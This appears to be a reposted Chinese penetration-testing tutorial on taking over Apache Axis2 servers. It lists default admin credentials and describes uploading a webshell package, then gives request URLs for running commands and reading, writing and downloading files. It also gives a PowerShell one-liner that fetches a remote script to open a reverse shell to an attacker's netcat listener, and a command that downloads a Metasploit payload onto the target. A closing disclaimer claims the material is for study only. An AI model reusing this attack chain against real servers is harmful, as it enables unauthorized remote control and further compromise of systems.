Axis2默認弱口令后台Getshell+windows反彈webshell+metasploit提權


上傳aar包獲取webshell

  • 默認弱口令進入axis2控制台
http://ip:port/axis2/axis2-admin/login
默認口令密碼
admin
axis2

  • aar包,使用方法

下載地址

支持的命令?
exec-運行命令,在Linux / Windows上均可使用,不用擔心。

http://192.168.56.103:8080/axis2/services/AxisInvoker/exec?cmd=dir%20C:

寫-寫文件

http://192.168.56.103:8080/axis2/services/AxisInvoker/write?path=c:\1.1txt&content=123

info-顯示某些信息,根據需要進行修改

http://192.168.56.103:8080/axis2/services/AxisInvoker/info

讀取-讀取文件內容

http://192.168.56.103:8080/axis2/services/AxisInvoker/read?path=c:\boot.ini

下載-下載文件並將其保存在某處

http://192.168.56.103:8080/axis2/services/AxisInvoker/download?url=http://www.baidu.com&file=c:\122.txt

windows命令行反彈shell

利用aarwebshell執行powershell反彈命令,攻擊端nc監聽

nc -lvp 6666
http://ip:port/axis2/services/AxisInvoker/exec?cmd=powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/9a3c747bcf535ef82dc4c5c66aac36db47c2afde/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress yourip -port 6666

植入metasploit反彈shell

將msf生成shellcode存放網站目錄——>利用目標服務器powershell下載——>執行shell,反彈成功

powershell (new-object System.Net.WebClient).DownloadFile( 'http://ip/shell1.exe','C:\Program Files\Apache Software Foundation\Tomcat 7.0\system.exe')


參考鏈接

windows命令行反彈shell(一)
windows命令下載大全
CaledoniaProject/AxisInvoker

聲明

嚴禁讀者利用以上介紹知識點對網站進行非法操作 , 本文僅用於技術交流和學習 , 如果您利用文章中介紹的知識對他人造成損失 , 后果由您自行承擔 , 如果您不能同意該約定 , 請您務必不要閱讀該文章 , 感謝您的配合!


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM